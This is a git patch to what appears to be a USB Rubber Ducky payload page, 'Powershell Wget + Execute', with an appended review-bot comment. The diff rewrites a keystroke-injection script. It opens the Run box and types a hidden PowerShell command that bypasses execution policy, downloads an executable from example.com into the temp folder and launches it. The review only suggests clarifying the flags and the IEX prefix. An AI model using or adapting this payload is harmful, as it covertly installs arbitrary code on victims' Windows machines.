From 072906e2903cf34d6f8760510c6da78598042413 Mon Sep 17 00:00:00 2001 From: Darren Kitchen Date: Mon, 7 Nov 2016 14:07:38 -0800 Subject: [PATCH] Updated Payload powershell wget execute (rdoc) --- Payload---powershell-wget---execute.rdoc | 12 +++--------- 1 file changed, 3 insertions(+), 9 deletions(-) diff --git a/Payload---powershell-wget---execute.rdoc b/Payload---powershell-wget---execute.rdoc index db31dd4..31f1548 100644 --- a/Payload---powershell-wget---execute.rdoc +++ b/Payload---powershell-wget---execute.rdoc @@ -1,22 +1,16 @@ Powershell Wget + Execute Author: mubix -Duckencoder: 1.2 +Duckencoder: 1.3 Target: Windows 7 Description: Opens “RUN” box, throws power shell string, enter. Supports HTTP/S, and proxies. GUI r DELAY 100 - STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','$env:temp\bob.exe'); Start-Process "$env:temp\bob.exe" + STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('http://example.com/bob.txt',\"$env:temp\bob.exe\"); Start-Process \"$env:temp\bob.exe\"" ENTER -Adding two words to this makes it possible to hide the powershell window as it downloads and executes. +Note -windowstyle hidden hides the powershell window. Also mind the escaped quotes around $env:temp, otherwise the environment variable won't expand. -``` -GUI r -DELAY 100 -STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','$env:temp\bob.exe'); Start-Process "$env:temp\bob.exe" -ENTER -``` Edited by: Fahad Alkamli
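Review bot: the explanatory note added in this hunk does not match the command it describes: it says `-windowstyle hidden` hides the window, but the new STRING line uses the abbreviated form `-W Hidden`, so a reader comparing the note to the line will not find the flag it names. State in the note that `-W` is the short form of `-WindowStyle` (and similarly that `-NoP`, `-NonI` and `-Exec` abbreviate `-NoProfile`, `-NonInteractive` and `-ExecutionPolicy`), or spell the flag out in the STRING line so the two agree. Also, the `IEX` prefix is applied to the result of `DownloadFile(...)`, a method that returns no value, so there is no expression for Invoke-Expression to evaluate; either drop the prefix or document why it is there, because as written the note implies it contributes to the download-and-run behaviour when only `Start-Process` does. Finally, the removed fenced example was the only place the old explanation ("Adding two words...") was shown in full; since the replacement note now carries that explanation, the deletion is fine, but the header `Description:` context line should be updated in a follow-up to say the window is hidden rather than just "throws power shell string".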